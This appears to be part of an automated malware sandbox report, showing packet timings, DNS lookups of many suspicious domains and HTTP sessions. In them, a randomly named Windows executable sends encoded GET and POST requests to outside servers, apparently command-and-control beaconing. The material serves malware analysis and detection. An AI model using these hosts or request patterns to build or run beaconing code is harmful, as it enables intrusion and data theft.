                                                  Jul 1, 2024 19:26:07.158963919 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.158972025 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159035921 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159061909 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159156084 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159173012 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159184933 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159198046 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159208059 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159272909 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159272909 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159301996 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159313917 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159324884 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159337997 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159378052 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159416914 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159416914 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159506083 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159518003 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159531116 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159540892 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159553051 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159564018 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159574032 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159581900 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159585953 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159638882 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159638882 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159674883 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159687996 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159698009 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159709930 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159719944 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159732103 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.159780979 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.159818888 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.160142899 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160291910 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160303116 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160315037 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160325050 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160336018 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160348892 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160372019 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.160444975 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.160444975 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.160454988 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160465956 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160478115 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160494089 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160505056 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160551071 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.160607100 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:07.160717964 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:07.161302090 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:11.603894949 CEST6448180192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:11.609134912 CEST806448143.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:11.609210014 CEST6448180192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:11.611465931 CEST6448180192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:11.617438078 CEST806448143.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:12.000643015 CEST8064480185.234.72.101192.168.2.7
                                                  Jul 1, 2024 19:26:12.000727892 CEST6448080192.168.2.7185.234.72.101
                                                  Jul 1, 2024 19:26:12.484647036 CEST806448143.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:12.484669924 CEST806448143.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:12.484730959 CEST6448180192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:12.485467911 CEST806448143.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:12.485524893 CEST6448180192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:13.126905918 CEST6448180192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:14.141659975 CEST6448280192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:14.146666050 CEST806448243.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:14.146759033 CEST6448280192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:14.148614883 CEST6448280192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:14.153630018 CEST806448243.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:15.038206100 CEST806448243.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:15.038253069 CEST806448243.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:15.038558960 CEST806448243.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:15.038670063 CEST6448280192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:15.654498100 CEST6448280192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:16.677923918 CEST6448380192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:16.683092117 CEST806448343.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:16.687134981 CEST6448380192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:16.690655947 CEST6448380192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:16.695537090 CEST806448343.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:16.696787119 CEST806448343.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:17.580858946 CEST806448343.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:17.580935955 CEST806448343.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:17.580990076 CEST6448380192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:17.581695080 CEST806448343.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:17.581748962 CEST6448380192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:18.201446056 CEST6448380192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:19.222517014 CEST6448480192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:19.227580070 CEST806448443.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:19.227669001 CEST6448480192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:19.230746031 CEST6448480192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:19.236967087 CEST806448443.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:20.122318983 CEST806448443.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:20.122387886 CEST806448443.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:20.122426033 CEST806448443.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:20.122515917 CEST6448480192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:20.122515917 CEST6448480192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:20.125293970 CEST6448480192.168.2.743.198.80.127
                                                  Jul 1, 2024 19:26:20.130311012 CEST806448443.198.80.127192.168.2.7
                                                  Jul 1, 2024 19:26:25.494776964 CEST6448580192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:25.500606060 CEST806448545.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:25.500791073 CEST6448580192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:25.502549887 CEST6448580192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:25.507577896 CEST806448545.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:26.293921947 CEST806448545.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:26.294049978 CEST806448545.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:26.294126987 CEST6448580192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:27.014413118 CEST6448580192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:28.032898903 CEST6448680192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:28.039026022 CEST806448645.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:28.039128065 CEST6448680192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:28.041009903 CEST6448680192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:28.045907974 CEST806448645.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:28.835242987 CEST806448645.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:28.835377932 CEST806448645.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:28.835484028 CEST6448680192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:29.545177937 CEST6448680192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:30.564522982 CEST6448780192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:30.569879055 CEST806448745.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:30.574495077 CEST6448780192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:30.574495077 CEST6448780192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:30.579497099 CEST806448745.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:30.580013990 CEST806448745.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:31.389900923 CEST806448745.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:31.390142918 CEST806448745.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:31.390259027 CEST6448780192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:32.077310085 CEST6448780192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:33.094847918 CEST6448880192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:33.238241911 CEST806448845.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:33.238416910 CEST6448880192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:33.240206957 CEST6448880192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:33.245395899 CEST806448845.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:34.063911915 CEST806448845.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:34.064093113 CEST806448845.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:34.064141989 CEST6448880192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:34.066615105 CEST6448880192.168.2.745.130.41.249
                                                  Jul 1, 2024 19:26:34.071408033 CEST806448845.130.41.249192.168.2.7
                                                  Jul 1, 2024 19:26:39.188528061 CEST6448980192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:39.193618059 CEST806448991.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:39.193754911 CEST6448980192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:39.195626974 CEST6448980192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:39.201169014 CEST806448991.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:39.897694111 CEST806448991.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:39.897720098 CEST806448991.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:39.897751093 CEST806448991.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:39.897780895 CEST6448980192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:39.897818089 CEST6448980192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:40.704631090 CEST6448980192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:41.746326923 CEST6449080192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:41.752542973 CEST806449091.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:41.752614975 CEST6449080192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:41.755805016 CEST6449080192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:41.760642052 CEST806449091.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:42.421699047 CEST806449091.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:42.422107935 CEST806449091.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:42.422164917 CEST6449080192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:43.264028072 CEST6449080192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:44.282448053 CEST6449180192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:44.287460089 CEST806449191.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:44.287545919 CEST6449180192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:44.289427996 CEST6449180192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:44.294337034 CEST806449191.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:44.295077085 CEST806449191.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:45.795233965 CEST6449180192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:45.802994013 CEST806449191.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:45.803076982 CEST6449180192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:46.813823938 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:46.819072962 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:46.822117090 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:46.825320959 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:46.830137968 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.501921892 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.501945019 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.501957893 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502068043 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502079964 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502089977 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502103090 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502103090 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.502115011 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502125978 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502129078 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.502129078 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.502160072 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.502171040 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.502248049 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.506937027 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.506958008 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.507086039 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.596474886 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.596504927 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.596687078 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.597362995 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597376108 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597388983 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597402096 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597414017 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597425938 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597425938 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.597439051 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597450018 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597460985 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597474098 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.597474098 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.597498894 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.597551107 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.597935915 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:47.598074913 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.601759911 CEST6449280192.168.2.791.195.240.123
                                                  Jul 1, 2024 19:26:47.606650114 CEST806449291.195.240.123192.168.2.7
                                                  Jul 1, 2024 19:26:52.972213030 CEST6449380192.168.2.738.207.19.49
                                                  Jul 1, 2024 19:26:52.977063894 CEST806449338.207.19.49192.168.2.7
                                                  Jul 1, 2024 19:26:52.977186918 CEST6449380192.168.2.738.207.19.49
                                                  Jul 1, 2024 19:26:52.979090929 CEST6449380192.168.2.738.207.19.49
                                                  Jul 1, 2024 19:26:52.984067917 CEST806449338.207.19.49192.168.2.7
                                                  Jul 1, 2024 19:26:54.169118881 CEST806449338.207.19.49192.168.2.7
                                                  Jul 1, 2024 19:26:54.170180082 CEST806449338.207.19.49192.168.2.7
                                                  Jul 1, 2024 19:26:54.170260906 CEST6449380192.168.2.738.207.19.49
                                                  Jul 1, 2024 19:26:54.482778072 CEST6449380192.168.2.738.207.19.49
                                                  Jul 1, 2024 19:26:55.503592968 CEST6449480192.168.2.738.207.19.49
                                                  Jul 1, 2024 19:26:55.626859903 CEST806449438.207.19.49192.168.2.7
                                                  Jul 1, 2024 19:26:55.626961946 CEST6449480192.168.2.738.207.19.49
                                                  Jul 1, 2024 19:26:55.629261017 CEST6449480192.168.2.738.207.19.49
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 1, 2024 19:23:35.492649078 CEST | 192.168.2.7 | 1.1.1.1 | 0x7a98 | Standard query (0) | www.erhaltungsmassage.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:23:38.060596943 CEST | 192.168.2.7 | 1.1.1.1 | 0xbc9f | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jul 1, 2024 19:23:51.235771894 CEST | 192.168.2.7 | 1.1.1.1 | 0x31f9 | Standard query (0) | www.oyoing.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:24:07.407736063 CEST | 192.168.2.7 | 1.1.1.1 | 0xc5bb | Standard query (0) | www.foryourhealth19.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:24:20.806411028 CEST | 192.168.2.7 | 1.1.1.1 | 0xfc7f | Standard query (0) | www.oudcafeae.online | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:24:28.969827890 CEST | 192.168.2.7 | 1.1.1.1 | 0xe934 | Standard query (0) | www.86wqi.cyou | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:03.596227884 CEST | 192.168.2.7 | 1.1.1.1 | 0xabd | Standard query (0) | www.vivaepicmarbella.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:17.471127987 CEST | 192.168.2.7 | 1.1.1.1 | 0x6294 | Standard query (0) | www.lookstudiov.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:30.782805920 CEST | 192.168.2.7 | 1.1.1.1 | 0x5d53 | Standard query (0) | www.cr-pos.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:44.228532076 CEST | 192.168.2.7 | 1.1.1.1 | 0xc9a8 | Standard query (0) | www.antifabricated.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:52.830728054 CEST | 192.168.2.7 | 1.1.1.1 | 0xe6dc | Standard query (0) | www.tufftiff.xyz | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:11.238993883 CEST | 192.168.2.7 | 1.1.1.1 | 0xd879 | Standard query (0) | www.botokkkd4.top | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:25.142311096 CEST | 192.168.2.7 | 1.1.1.1 | 0x290c | Standard query (0) | www.cvt-auto.ru | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:39.080004930 CEST | 192.168.2.7 | 1.1.1.1 | 0x282c | Standard query (0) | www.ridcoredry.live | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:52.610913038 CEST | 192.168.2.7 | 1.1.1.1 | 0xc363 | Standard query (0) | www.filmbrute.com | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:27:07.268593073 CEST | 192.168.2.7 | 1.1.1.1 | 0x7780 | Standard query (0) | www.xn--gotopia-bya.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 1, 2024 19:23:35.514746904 CEST | 1.1.1.1 | 192.168.2.7 | 0x7a98 | No error (0) | www.erhaltungsmassage.com | | 217.160.0.31 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:23:38.303170919 CEST | 1.1.1.1 | 192.168.2.7 | 0xbc9f | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jul 1, 2024 19:23:51.256505013 CEST | 1.1.1.1 | 192.168.2.7 | 0x31f9 | No error (0) | www.oyoing.com | | 127.0.0.1 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:24:07.455321074 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5bb | No error (0) | www.foryourhealth19.com | | 172.67.194.145 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:24:07.455321074 CEST | 1.1.1.1 | 192.168.2.7 | 0xc5bb | No error (0) | www.foryourhealth19.com | | 104.21.84.156 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:24:20.902789116 CEST | 1.1.1.1 | 192.168.2.7 | 0xfc7f | Server failure (2) | www.oudcafeae.online | none | none | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:24:29.457137108 CEST | 1.1.1.1 | 192.168.2.7 | 0xe934 | No error (0) | www.86wqi.cyou | | 38.55.194.30 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:03.772133112 CEST | 1.1.1.1 | 192.168.2.7 | 0xabd | No error (0) | www.vivaepicmarbella.com | | 46.30.215.51 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:17.489001036 CEST | 1.1.1.1 | 192.168.2.7 | 0x6294 | No error (0) | www.lookstudiov.com | | 74.208.236.162 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:31.075479031 CEST | 1.1.1.1 | 192.168.2.7 | 0x5d53 | No error (0) | www.cr-pos.com | | 192.250.231.28 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:44.763315916 CEST | 1.1.1.1 | 192.168.2.7 | 0xc9a8 | Server failure (2) | www.antifabricated.com | none | none | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:25:52.979449034 CEST | 1.1.1.1 | 192.168.2.7 | 0xe6dc | No error (0) | www.tufftiff.xyz | | 162.0.238.43 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:11.600975037 CEST | 1.1.1.1 | 192.168.2.7 | 0xd879 | No error (0) | www.botokkkd4.top | botokkkd4.top | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 19:26:11.600975037 CEST | 1.1.1.1 | 192.168.2.7 | 0xd879 | No error (0) | botokkkd4.top | | 43.198.80.127 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:25.492132902 CEST | 1.1.1.1 | 192.168.2.7 | 0x290c | No error (0) | www.cvt-auto.ru | | 45.130.41.249 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:39.183476925 CEST | 1.1.1.1 | 192.168.2.7 | 0x282c | No error (0) | www.ridcoredry.live | | 91.195.240.123 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:26:52.969223022 CEST | 1.1.1.1 | 192.168.2.7 | 0xc363 | No error (0) | www.filmbrute.com | | 38.207.19.49 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 19:27:07.321743011 CEST | 1.1.1.1 | 192.168.2.7 | 0x7780 | No error (0) | www.xn--gotopia-bya.com | xn--gotopia-bya.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 19:27:07.321743011 CEST | 1.1.1.1 | 192.168.2.7 | 0x7780 | No error (0) | xn--gotopia-bya.com | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                                                  • www.erhaltungsmassage.com
                                                  • www.foryourhealth19.com
                                                  • www.86wqi.cyou
                                                  • www.vivaepicmarbella.com
                                                  • www.lookstudiov.com
                                                  • www.cr-pos.com
                                                  • www.tufftiff.xyz
                                                  • 185.234.72.101
                                                  • www.botokkkd4.top
                                                  • www.cvt-auto.ru
                                                  • www.ridcoredry.live
                                                  • www.filmbrute.com
                                                  • www.xn--gotopia-bya.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49712 | 217.160.0.31 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 19:23:35.528269053 CEST | 464 | OUT | GET /ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcp HTTP/1.1
                                                  Host: www.erhaltungsmassage.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Jul 1, 2024 19:23:36.188384056 CEST | 745 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Content-Length: 601
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:23:36 GMT
                                                  Server: Apache
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 64456 | 172.67.194.145 | 80 | 6696 | C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 19:24:07.464421034 CEST | 737 | OUT | POST /ym7q/ HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
